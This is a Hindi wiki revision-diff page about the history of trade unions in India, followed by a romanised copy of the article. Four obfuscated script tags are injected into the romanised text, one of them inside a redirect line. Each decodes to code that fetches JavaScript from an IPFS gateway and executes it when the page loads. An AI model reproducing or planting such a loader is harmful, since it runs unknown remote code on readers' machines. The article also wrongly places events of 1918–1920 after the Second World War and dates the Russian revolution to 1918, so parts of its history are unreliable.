Difference between revisions of "श्रमिक संघ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
*'श्रमिकों के सभी प्रकार के समान हितों की रक्षा करने के उद्देश्य से बनाया गया, श्रमिकों का संगठन '''श्रमिक संघ''' कहलाता है।
+
'श्रमिकों के सभी प्रकार के समान हितों की रक्षा करने के उद्देश्य से बनाया गया, श्रमिकों का संगठन '''श्रमिक संघ''' कहलाता है। [[भारत]] में आधुनिक उद्योगों की शुरुआत 1850 ई. से 1870 ई. के बीच हुई थी। आद्योगिकीकरण के साथ-साथ इस क्षेत्र में अनेक बुराइयाँ, जैसे- अधिक समय तक श्रमिकों से काम लेना, कठोर श्रम, आवास की असुविधा, कम परिश्रमिक, मृत्यु दर में अधिकता आदि व्याप्त थीं। इन बुराईयों को थोड़ा बहुत कम करने के लिए ब्रिटिश भारत की सरकार ने कई कारख़ाना अधिनियम बनाये, पर इन अधिनियमों द्वारा इन क्षेत्रों में कोई क्रांतिकारी परिवर्तन नहीं हुआ। श्रमिकों ने औपनिवेशिक राज्य से लड़ने के लिए संगठन की आवश्यकता महसूस की, जिसके परिणामस्वरूप 1884 ई. में [[भारत]] के पहले '''श्रमिक संघ''', 'बम्बई मिल हैण्ड ऐसोसिएशन' की स्थापना एन.एम.लोखण्डे के नेतृत्व में की गई।
*[[भारत]] में आधुनिक उद्योगों की शुरुआत 1850 ई. से 1870 ई. के बीच हुई थी।
+
==संगठन का उद्देश्य==
*आद्योगिकीकरण के साथ-साथ इस क्षेत्र में अनेक बुराइयाँ, जैसे- अधिक समय तक श्रमिकों से काम लेना, कठोर श्रम, आवास की असुविधा, कम परिश्रमिक, मृत्यु दर में अधिकता आदि व्याप्त थीं।
+
श्रमिकों के इस संगठन ने [[मराठी भाषा]] में 'दीनबन्धु' नामक अख़बार भी प्रकाशित किया। 1897 ई. में 'अमलगमेटिड सोसाइटी ऑफ़ रेलवे सर्वेन्टस ऑफ़ इण्डिया एण्ड बर्मा' की स्थापना हुई। इसके अतिरिक्त 1905 ई. में 'कलकत्ता प्रिन्टर्स यूनियन', 1907 ई. में 'बम्बई पोस्टल यूनियन' और और 1910 ई. में 'कामगार हितवर्धक सभा' की स्थापना हुई। इन संगठनों का एकमात्र उद्देश्य था- फैक्ट्री प्रणाली में व्याप्त बुराइयों को समाप्त करना। मजदूर वर्ग की प्रथम संगठित हड़ताल ब्रिटिश स्वामित्व वाली रेलवे, जिसका नाम 'ग्रेट इण्डियन पेनन्सुलर रेलवे' था, 1899 ई. में मजदूरी, काम के घण्टों तथा अन्य सेवा शर्तों में सुधार को लेकर हुई थी। द्वितीय विश्वयुद्ध के बाद राजनैतिक आन्दोलनों के फलस्वरूप '[[श्रमिक आन्दोलन]]' को भी बल प्राप्त हो गया था।
*इन बुराईयों को थोड़ा बहुत कम करने के लिए ब्रिटिश भारत की सरकार ने कई कारख़ाना अधिनियम बनाये, पर इन अधिनियमों द्वारा इन क्षेत्रों में कोई क्रांतिकारी परिवर्तन नहीं हुआ।
+
====श्रमिक आन्दोलन====
*श्रमिकों ने औपनिवेशिक राज्य से लड़ने के लिए संगठन की आवश्यकता महसूस की, जिसके परिणामस्वरूप 1884 ई. में [[भारत]] का पहला 'श्रमिक संघ' (जिसे वास्तविक रूप से 'श्रमिक संघ' नहीं माना जाता)  'बम्बई मिल हैण्ड ऐसोसिएशन' की स्थापना एन.एम.लोखण्डे के नेतृत्व में की गई।
+
{{main|श्रमिक आन्दोलन}}
*इस संगठन में [[मराठी भाषा]] में 'दीनबन्धु' नामक अख़बार भी प्रकाशित किया गया।
+
द्वितीय विश्व युद्ध के समाप्त हो जाने के बाद राजनैतिक आन्दोलनों में काफ़ी तेज़ी आई, जिसके फलस्वरूप श्रमिकों के आन्दोलनों को बल मिला। [[रूस]] में 1918 ई. की 'साम्यवादी क्रांति' ने भारतीय मजदूर संघों को प्रोत्साहित किया। अन्तर्राष्ट्रीय स्तर पर 'अन्तर्राष्ट्रीय मजदूर संघ' (आई.एल.ओ.) की स्थापना हुई। वी.पी. वाडिया ने भारत में आधुनिक श्रमिक संघ 'मद्रास श्रमिक संघ' की स्थापना की। उन्हीं के प्रयासों से 1926 ई. में 'श्रमिक संघ अधिनियम' पारित किया गया। 1920 ई. में स्थापित 'अखिल भारतीय ट्रेड यूनियन कांग्रेस' (ए.आई.टी.यू.सी.) में तत्कालीन,  लगभग 64 श्रमिक संघ शामिल हो गये। एन.एम.जोशी, [[लाला लाजपत राय]] एवं जोसेफ़ बैपटिस्टा के प्रयत्नों से 1920 ई. में स्थापित 'अखिल भारतीय ट्रेड यूनियन कांग्रेस' पर वामपंथियों का प्रभाव बढ़ने लगा। 'एटक' (ए.आई.टी.यू.सी) के प्रथम अध्यक्ष लाला लाजपत राय थे। यह सम्मेलन 1920 ई. में [[बम्बई]] में हुआ था। इसके उपाध्यक्ष जोसेफ़ बैप्टिस्टा तथा महामंत्री [[दीवान]] चमनलाल थे।
*1897 ई. में 'अमलगमेटिड सोसाइटी ऑफ़ रेलवे सर्वेन्टस ऑफ़ इण्डिया एण्ड बर्मा' की स्थापना हुई।
 
*इसके अतिरिक्त 1905 ई. में 'कलकत्ता प्रिन्टर्स यूनियन', 1907 ई. में 'बम्बई पोस्टल यूनियन' और और 1910 ई. में 'कामगार हितवर्धक सभा' की स्थापना हुई।
 
*इन संगठनों का एकमात्र उद्देश्य था- फैक्ट्री प्रणाली में व्याप्त बुराइयों को समाप्त करना।
 
*मजदूर वर्ग की प्रथम संगठित हड़ताल ब्रिटिश स्वामित्व वाली रेलवे, जिसका नाम 'ग्रेट इण्डियन पेनन्सुलर रेलवे' था, 1899 ई. में मजदूरी, काम के घण्टों तथा अन्य सेवा शर्तों में सुधार को लेकर हुई थी।
 
*द्वितीय विश्वयुद्ध के बाद राजनैतिक आन्दोलनों के फलस्वरूप [[श्रमिक आन्दोलन]] को भी बल प्राप्त हो गया था।
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
Line 22: Line 17:
 
[[Category:आधुनिक काल]]
 
[[Category:आधुनिक काल]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 12:40, 9 August 2011

'shramikoan ke sabhi prakar ke saman hitoan ki raksha karane ke uddeshy se banaya gaya, shramikoan ka sangathan shramik sangh kahalata hai. bharat mean adhunik udyogoan ki shuruat 1850 ee. se 1870 ee. ke bich huee thi. adyogikikaran ke sath-sath is kshetr mean anek buraiyaan, jaise- adhik samay tak shramikoan se kam lena, kathor shram, avas ki asuvidha, kam parishramik, mrityu dar mean adhikata adi vyapt thian. in buraeeyoan ko tho da bahut kam karane ke lie british bharat ki sarakar ne kee karakhana adhiniyam banaye, par in adhiniyamoan dvara in kshetroan mean koee kraantikari parivartan nahian hua. shramikoan ne aupaniveshik rajy se l dane ke lie sangathan ki avashyakata mahasoos ki, jisake parinamasvaroop 1884 ee. mean bharat ke pahale shramik sangh, 'bambee mil haind aisosieshan' ki sthapana en.em.lokhande ke netritv mean ki gee.

sangathan ka uddeshy

shramikoan ke is sangathan ne marathi bhasha mean 'dinabandhu' namak akhabar bhi prakashit kiya. 1897 ee. mean 'amalagametid sosaiti aauf relave sarventas aauf indiya end barma' ki sthapana huee. isake atirikt 1905 ee. mean 'kalakatta printars yooniyan', 1907 ee. mean 'bambee postal yooniyan' aur aur 1910 ee. mean 'kamagar hitavardhak sabha' ki sthapana huee. in sangathanoan ka ekamatr uddeshy tha- phaiktri pranali mean vyapt buraiyoan ko samapt karana. majadoor varg ki pratham sangathit h datal british svamitv vali relave, jisaka nam 'gret indiyan penansular relave' tha, 1899 ee. mean majadoori, kam ke ghantoan tatha any seva shartoan mean sudhar ko lekar huee thi. dvitiy vishvayuddh ke bad rajanaitik andolanoan ke phalasvaroop 'shramik andolan' ko bhi bal prapt ho gaya tha.

shramik andolan

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

dvitiy vishv yuddh ke samapt ho jane ke bad rajanaitik andolanoan mean kafi tezi aee, jisake phalasvaroop shramikoan ke andolanoan ko bal mila. roos mean 1918 ee. ki 'samyavadi kraanti' ne bharatiy majadoor sanghoan ko protsahit kiya. antarrashtriy star par 'antarrashtriy majadoor sangh' (aee.el.o.) ki sthapana huee. vi.pi. vadiya ne bharat mean adhunik shramik sangh 'madras shramik sangh' ki sthapana ki. unhian ke prayasoan se 1926 ee. mean 'shramik sangh adhiniyam' parit kiya gaya. 1920 ee. mean sthapit 'akhil bharatiy tred yooniyan kaangres' (e.aee.ti.yoo.si.) mean tatkalin, lagabhag 64 shramik sangh shamil ho gaye. en.em.joshi, lala lajapat ray evan josef baipatista ke prayatnoan se 1920 ee. mean sthapit 'akhil bharatiy tred yooniyan kaangres' par vamapanthiyoan ka prabhav badhane laga. 'etak' (e.aee.ti.yoo.si) ke pratham adhyaksh lala lajapat ray the. yah sammelan 1920 ee. mean bambee mean hua tha. isake upadhyaksh josef baiptista tatha mahamantri divan chamanalal the.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>